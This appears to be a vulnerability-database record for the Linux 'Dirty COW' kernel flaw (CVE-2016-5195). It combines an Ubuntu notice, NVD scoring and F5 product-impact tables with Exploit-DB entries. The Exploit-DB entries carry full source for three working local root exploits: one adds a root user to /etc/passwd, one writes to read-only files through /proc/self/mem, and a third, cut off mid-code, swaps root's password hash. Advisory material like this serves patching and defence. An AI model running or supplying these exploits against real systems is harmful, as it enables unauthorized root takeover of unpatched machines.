ID USN-3106-1 Type ubuntu Reporter Ubuntu Modified 2016-10-20T00:00:00
Description
It was discovered that a race condition existed in the memory manager of
the Linux kernel when handling copy-on-write breakage of private read-only
memory mappings. A local attacker could use this to gain administrative
privileges.
{"attackerkb": [{"lastseen": "2020-11-22T06:19:47", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \u201cDirty COW.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:23am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-06-05T00:00:00", "published": "2016-11-10T00:00:00", "id": "AKB:B6D57715-C0B3-48BB-8FDE-F3868F92DB1F", "href": "https://attackerkb.com/topics/E6o7dgfSHk/cve-2016-5195", "type": "attackerkb", "title": "CVE-2016-5195", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "android": [{"lastseen": "2020-06-22T14:42:11", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \"Dirty COW.\"", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-11-01T00:00:00", "id": "ANDROID:CVE-2016-5195", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-5195.html", "title": "CVE-2016-5195", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T13:21:10", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], 
"description": "A race condition in the Linux kernel's handling of copy-on-write (COW) operations means that users can gain write access to otherwise read-only areas of memory and gain permissions", "edition": 2, "modified": "2019-07-09T00:00:00", "published": "2016-10-13T00:00:00", "id": "ANDROID:DIRTYC0W", "href": "http://www.androidvulnerabilities.org/vulnerabilities/dirtyc0w.html", "title": "dirtyc0w", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:28:08", "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \"Dirty COW.\"", "edition": 18, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-10T21:59:00", "title": "CVE-2016-5195", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5195"], "modified": "2020-02-17T16:15:00", "cpe": 
["cpe:/o:redhat:enterprise_linux_aus:6.2", "cpe:/o:redhat:enterprise_linux_eus:7.1", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux_long_life:5.6", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_eus:6.6", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:redhat:enterprise_linux_aus:6.5", "cpe:/o:redhat:enterprise_linux_eus:6.7", "cpe:/o:redhat:enterprise_linux_tus:6.5", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_long_life:5.9", "cpe:/o:redhat:enterprise_linux_aus:6.4", "cpe:/o:canonical:ubuntu_core:15.04", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "CVE-2016-5195", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5195", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_long_life:5.6:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_core:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_long_life:5.9:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:7.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:6.7:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_tus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:6.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.5:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:40:20", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "\nF5 Product Development has assigned 
IDs 624457 and 624459 (BIG-IP), ID 625230 (BIG-IQ), ID 625231 (Enterprise Manager), INSTALLER-2794 (Traffix SDC), and ID 625362 (F5 iWorkflow) to this vulnerability. Additionally, [F5 iHealth](<https://www.f5.com/services/support/support-offerings/big-ip-ihealth-diagnostic-tool>) may list Heuristic H624248 on the **Diagnostics** > **Identified** > **High** page. \n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP AAM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP AFM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP Analytics | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP APM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP ASM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP DNS | 12.0.0 - 12.1.2 | 13.0.0 \n12.1.2 HF1 | High | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 \n10.2.1 - 10.2.4 | None | High | Linux kernel \nBIG-IP GTM | 11.4.0 - 11.6.1 \n11.2.1 | 11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP Link Controller | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 
\n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP PEM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP PSM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | None | High | Linux kernel \nBIG-IP WOM | 11.2.1 | None | High | Linux kernel \nBIG-IP WebSafe | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b11.6.2 \n11.6.1 HF2 | High | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | 3.1.1 HF8 | High | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Device | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | High | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | 5.2.0 - 5.3.0 | High | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.0.1 | 2.0.2 - 2.3.0 | High | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | High | Linux kernel \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel \n \nF5 will not develop a fix for vulnerable products that do not already have a fixed version listed in this article, and will not update this table with subsequent vulnerable releases in the associated branches. F5 recommends that you update to more recent, non-vulnerable versions whenever feasible. 
For more information, refer to [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 15.x)](<https://support.f5.com/csp/article/K13123>)\n", "edition": 1, "modified": "2019-09-26T18:41:00", "published": "2016-10-21T18:38:00", "id": "F5:K10558632", "href": "https://support.f5.com/csp/article/K10558632", "title": "Linux privilege-escalation vulnerability CVE-2016-5195 ", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-21T17:25:15", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "Supplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical 
issue hotfix policy\n", "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/10/sol10558632.html", "id": "SOL10558632", "type": "f5", "title": "SOL10558632 - Linux privilege-escalation vulnerability (Dirty COW) CVE-2016-5195", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2016-11-28T21:23:40", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation. CVE-2016-5195. Local exploit for Linux platform", "published": "2016-11-28T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-28T00:00:00", "id": "EDB-ID:40839", "href": "https://www.exploit-db.com/exploits/40839/", "sourceData": "//\r\n// This exploit uses the pokemon exploit as a base and automatically\r\n// generates a new passwd line. 
The original /etc/passwd is then\r\n// backed up to /tmp/passwd.bak and overwritten with the new line.\r\n// The user will be prompted for the new password when the binary is run.\r\n// After running the exploit you should be able to login with the newly\r\n// created user.\r\n//\r\n// Original exploit:\r\n// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c\r\n//\r\n// To use this exploit modify the user values according to your needs\r\n//\r\n// Compile with\r\n//\r\n// gcc -pthread dirty.c -o dirty -lcrypt\r\n//\r\n// and just run the newly create binary with ./dirty\r\n//\r\n// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT !\r\n//\r\n// Exploit adopted by Christian \"FireFart\" Mehlmauer\r\n// https://firefart.at\r\n//\r\n\r\n\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/wait.h>\r\n#include <sys/ptrace.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <crypt.h>\r\n\r\nconst char *filename = \"/etc/passwd\";\r\nconst char *backup_filename = \"/tmp/passwd.bak\";\r\nconst char *salt = \"firefart\";\r\n\r\nint f;\r\nvoid *map;\r\npid_t pid;\r\npthread_t pth;\r\nstruct stat st;\r\n\r\nstruct Userinfo {\r\n char *username;\r\n char *hash;\r\n int user_id;\r\n int group_id;\r\n char *info;\r\n char *home_dir;\r\n char *shell;\r\n};\r\n\r\nchar *generate_password_hash(char *plaintext_pw) {\r\n return crypt(plaintext_pw, salt);\r\n}\r\n\r\nchar *generate_passwd_line(struct Userinfo u) {\r\n const char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\";\r\n int size = snprintf(NULL, 0, format, u.username, u.hash,\r\n u.user_id, u.group_id, u.info, u.home_dir, u.shell);\r\n char *ret = malloc(size + 1);\r\n sprintf(ret, format, u.username, u.hash, u.user_id,\r\n u.group_id, u.info, u.home_dir, u.shell);\r\n return ret;\r\n}\r\n\r\nvoid *madviseThread(void *arg) {\r\n int i, c 
= 0;\r\n for(i = 0; i < 200000000; i++) {\r\n c += madvise(map, 100, MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\", c);\r\n}\r\n\r\nint copy_file(const char *from, const char *to) {\r\n // check if target file already exists\r\n if(access(to, F_OK) != -1) {\r\n printf(\"File %s already exists! Please delete it and run again\\n\",\r\n to);\r\n return -1;\r\n }\r\n\r\n char ch;\r\n FILE *source, *target;\r\n\r\n source = fopen(from, \"r\");\r\n if(source == NULL) {\r\n return -1;\r\n }\r\n target = fopen(to, \"w\");\r\n if(target == NULL) {\r\n fclose(source);\r\n return -1;\r\n }\r\n\r\n while((ch = fgetc(source)) != EOF) {\r\n fputc(ch, target);\r\n }\r\n\r\n printf(\"%s successfully backed up to %s\\n\",\r\n from, to);\r\n\r\n fclose(source);\r\n fclose(target);\r\n\r\n return 0;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n // backup file\r\n int ret = copy_file(filename, backup_filename);\r\n if (ret != 0) {\r\n exit(ret);\r\n }\r\n\r\n struct Userinfo user;\r\n // set values, change as needed\r\n user.username = \"firefart\";\r\n user.user_id = 0;\r\n user.group_id = 0;\r\n user.info = \"pwned\";\r\n user.home_dir = \"/root\";\r\n user.shell = \"/bin/bash\";\r\n\r\n char *plaintext_pw = getpass(\"Please enter new password: \");\r\n user.hash = generate_password_hash(plaintext_pw);\r\n char *complete_passwd_line = generate_passwd_line(user);\r\n printf(\"Complete line:\\n%s\\n\", complete_passwd_line);\r\n\r\n f = open(filename, O_RDONLY);\r\n fstat(f, &st);\r\n map = mmap(NULL,\r\n st.st_size + sizeof(long),\r\n PROT_READ,\r\n MAP_PRIVATE,\r\n f,\r\n 0);\r\n printf(\"mmap: %lx\\n\",(unsigned long)map);\r\n pid = fork();\r\n if(pid) {\r\n waitpid(pid, NULL, 0);\r\n int u, i, o, c = 0;\r\n int l=strlen(complete_passwd_line);\r\n for(i = 0; i < 10000/l; i++) {\r\n for(o = 0; o < l; o++) {\r\n for(u = 0; u < 10000; u++) {\r\n c += ptrace(PTRACE_POKETEXT,\r\n pid,\r\n map + o,\r\n *((long*)(complete_passwd_line + o)));\r\n }\r\n }\r\n }\r\n 
printf(\"ptrace %d\\n\",c);\r\n }\r\n else {\r\n pthread_create(&pth,\r\n NULL,\r\n madviseThread,\r\n NULL);\r\n ptrace(PTRACE_TRACEME);\r\n kill(getpid(), SIGSTOP);\r\n pthread_join(pth,NULL);\r\n }\r\n\r\n printf(\"Done! Check %s to see if the new user was created\\n\", filename);\r\n printf(\"You can log in with username %s and password %s.\\n\\n\",\r\n user.username, plaintext_pw);\r\n printf(\"\\nDON'T FORGET TO RESTORE %s FROM %s !!!\\n\\n\",\r\n filename, backup_filename);\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40839/"}, {"lastseen": "2016-10-21T21:29:10", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access). CVE-2016-5195. Local exploit for Linux platform", "published": "2016-10-19T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-19T00:00:00", "id": "EDB-ID:40611", "href": "https://www.exploit-db.com/exploits/40611/", "sourceData": "/*\r\n####################### dirtyc0w.c #######################\r\n$ sudo -s\r\n# echo this is not a test > foo\r\n# chmod 0404 foo\r\n$ ls -lah foo\r\n-r-----r-- 1 root root 19 Oct 20 15:23 foo\r\n$ cat foo\r\nthis is not a test\r\n$ gcc -lpthread dirtyc0w.c -o dirtyc0w\r\n$ ./dirtyc0w foo m00000000000000000\r\nmmap 56123000\r\nmadvise 0\r\nprocselfmem 1800000000\r\n$ cat foo\r\nm00000000000000000\r\n####################### dirtyc0w.c #######################\r\n*/\r\n#include <stdio.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <unistd.h>\r\n#include <sys/stat.h>\r\n#include <string.h>\r\n \r\nvoid *map;\r\nint f;\r\nstruct stat st;\r\nchar *name;\r\n \r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n 
for(i=0;i<100000000;i++)\r\n {\r\n/*\r\nYou have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661\r\n> This is achieved by racing the madvise(MADV_DONTNEED) system call\r\n> while having the page of the executable mmapped in memory.\r\n*/\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\",c);\r\n}\r\n \r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n/*\r\nYou have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16\r\n> The in the wild exploit we are aware of doesn't work on Red Hat\r\n> Enterprise Linux 5 and 6 out of the box because on one side of\r\n> the race it writes to /proc/self/mem, but /proc/self/mem is not\r\n> writable on Red Hat Enterprise Linux 5 and 6.\r\n*/\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<100000000;i++) {\r\n/*\r\nYou have to reset the file pointer to the memory position.\r\n*/\r\n lseek(f,map,SEEK_SET);\r\n c+=write(f,str,strlen(str));\r\n }\r\n printf(\"procselfmem %d\\n\\n\", c);\r\n}\r\n \r\n \r\nint main(int argc,char *argv[])\r\n{\r\n/*\r\nYou have to pass two arguments. File and Contents.\r\n*/\r\n if (argc<3)return 1;\r\n pthread_t pth1,pth2;\r\n/*\r\nYou have to open the file in read only mode.\r\n*/\r\n f=open(argv[1],O_RDONLY);\r\n fstat(f,&st);\r\n name=argv[1];\r\n/*\r\nYou have to use MAP_PRIVATE for copy-on-write mapping.\r\n> Create a private copy-on-write mapping. Updates to the\r\n> mapping are not visible to other processes mapping the same\r\n> file, and are not carried through to the underlying file. 
It\r\n> is unspecified whether changes made to the file after the\r\n> mmap() call are visible in the mapped region.\r\n*/\r\n/*\r\nYou have to open with PROT_READ.\r\n*/\r\n map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n printf(\"mmap %x\\n\\n\",map);\r\n/*\r\nYou have to do it on two threads.\r\n*/\r\n pthread_create(&pth1,NULL,madviseThread,argv[1]);\r\n pthread_create(&pth2,NULL,procselfmemThread,argv[2]);\r\n/*\r\nYou have to wait for the threads to finish.\r\n*/\r\n pthread_join(pth1,NULL);\r\n pthread_join(pth2,NULL);\r\n return 0;\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40611/"}, {"lastseen": "2016-11-29T17:23:22", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd). CVE-2016-5195. Local exploit for Linux platform", "published": "2016-11-27T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-27T00:00:00", "id": "EDB-ID:40847", "href": "https://www.exploit-db.com/exploits/40847/", "sourceData": "// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil\r\n// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\")\r\n//\r\n// -----------------------------------------------------------------\r\n// Copyright (C) 2016 Gabriele Bonacini\r\n//\r\n// This program is free software; you can redistribute it and/or modify\r\n// it under the terms of the GNU General Public License as published by\r\n// the Free Software Foundation; either version 3 of the License, or\r\n// (at your option) any later version.\r\n// This program is distributed in the hope that it will be useful,\r\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n// 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n// GNU General Public License for more details.\r\n// You should have received a copy of the GNU General Public License\r\n// along with this program; if not, write to the Free Software Foundation,\r\n// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\r\n// -----------------------------------------------------------------\r\n\r\n#include <iostream>\r\n#include <fstream>\r\n#include <string>\r\n#include <thread>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <pwd.h>\r\n#include <pty.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <sys/wait.h>\r\n#include <signal.h>\r\n\r\n#define BUFFSIZE 1024\r\n#define PWDFILE \"/etc/passwd\"\r\n#define BAKFILE \"./.ssh_bak\"\r\n#define TMPBAKFILE \"/tmp/.ssh_bak\"\r\n#define PSM \"/proc/self/mem\"\r\n#define ROOTID \"root:\"\r\n#define SSHDID \"sshd:\"\r\n#define MAXITER 300\r\n#define DEFPWD \"$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/\"\r\n#define TXTPWD \"dirtyCowFun\\n\"\r\n#define DISABLEWB \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\\n\"\r\n#define EXITCMD \"exit\\n\"\r\n#define CPCMD \"cp \"\r\n#define RMCMD \"rm \"\r\n\r\nusing namespace std;\r\n\r\nclass Dcow{\r\n private:\r\n bool run, rawMode, opShell, restPwd;\r\n void *map;\r\n int fd, iter, master, wstat;\r\n string buffer, etcPwd, etcPwdBak,\r\n root, user, pwd, sshd;\r\n thread *writerThr, *madviseThr, *checkerThr;\r\n ifstream *extPwd;\r\n ofstream *extPwdBak;\r\n struct passwd *userId;\r\n pid_t child; \r\n char buffv[BUFFSIZE];\r\n fd_set rfds;\r\n struct termios termOld, termNew;\r\n ssize_t ign;\r\n\r\n void exitOnError(string msg);\r\n public:\r\n Dcow(bool opSh, bool rstPwd);\r\n ~Dcow(void);\r\n int expl(void); \r\n};\r\n\r\nDcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),\r\n iter(0), 
wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),\r\n madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr), \r\n child(0){ \r\n userId = getpwuid(getuid());\r\n user.append(userId->pw_name).append(\":\");\r\n extPwd = new ifstream(PWDFILE); \r\n while (getline(*extPwd, buffer)){\r\n buffer.append(\"\\n\");\r\n etcPwdBak.append(buffer);\r\n if(buffer.find(root) == 0){\r\n etcPwd.insert(0, root).insert(root.size(), pwd);\r\n etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(), \r\n buffer.begin() + buffer.find(\":\", root.size()), buffer.end());\r\n }else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){\r\n etcPwd.insert(0, buffer);\r\n }else{\r\n etcPwd.append(buffer);\r\n }\r\n }\r\n extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);\r\n extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());\r\n extPwdBak->close();\r\n fd = open(PWDFILE,O_RDONLY);\r\n map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);\r\n}\r\n\r\nDcow::~Dcow(void){\r\n extPwd->close();\r\n close(fd);\r\n delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;\r\n if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);\r\n if(child != 0) wait(&wstat); \r\n}\r\n\r\nvoid Dcow::exitOnError(string msg){\r\n cerr << msg << endl;\r\n // if(child != 0) kill(child, SIGKILL);\r\n throw new exception();\r\n}\r\n\r\nint Dcow::expl(void){\r\n madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });\r\n writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR); \r\n while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET); \r\n ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }\r\n });\r\n checkerThr = new thread([&](){ while(iter <= MAXITER){ \r\n extPwd->clear(); extPwd->seekg(0, ios::beg); \r\n buffer.assign(istreambuf_iterator<char>(*extPwd),\r\n istreambuf_iterator<char>());\r\n if(buffer.find(pwd) != string::npos && \r\n buffer.size() >= 
